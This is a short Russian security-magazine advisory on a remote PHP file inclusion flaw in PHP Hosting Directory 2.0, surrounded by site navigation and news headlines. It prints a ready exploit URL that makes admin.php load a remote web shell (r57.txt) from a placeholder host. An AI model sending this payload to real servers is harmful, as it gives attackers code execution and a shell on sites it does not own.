PHP-инклюдинг в PHP Hosting Directory

Рекомендуем почитать:

Xakep #286. Sad Guard

Содержание выпуска
Подписка на «Хакер»-60%

Программа: PHP Hosting Directory 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «rd» сценарием admin.php. Удаленный пользователь
может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера.

Эксплоит:

http://WwW.4RxH.CoM/phphost_directoryv2/include/admin.php?rd=http://site.com/r57.txt?

PHP-инклюдинг в PHP Hosting Directory

Xakep #286. Sad Guard

Последние взломы

HTB Extension. Пентестим плагин для Gitea и сбегаем из Docker

Опасный модем. Закрепляемся в атакованной системе при помощи USB-модема

Поставщик небезопасности. Как Windows раскрывает пароль пользователя

HTB Mentor. Извлекаем информацию из SNMP и пентестим API веб-сервиса

Компьютерные трюки

Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе

Крококряк. Снимаем трафик с витой пары обычными «крокодилами»

Linux на диете. Уменьшаем требования Bodhi Linux к оперативной памяти

Как писать статьи. Колонка главреда

Свежие новости

Чтобы избежать обнаружения, Emotet распространяется через файлы Microsoft OneNote

Ботнет HinataBot может устраивать DDoS-атаки мощностью 3,3 Тбит/с

Group-IB: количество кибератак в 2022 году выросло в три раза

Операторы вымогателя BianLian больше не шифруют файлы жертв, они просто требуют деньги

Арестован основатель и администратор BreachForums, известный под ником Pompompurin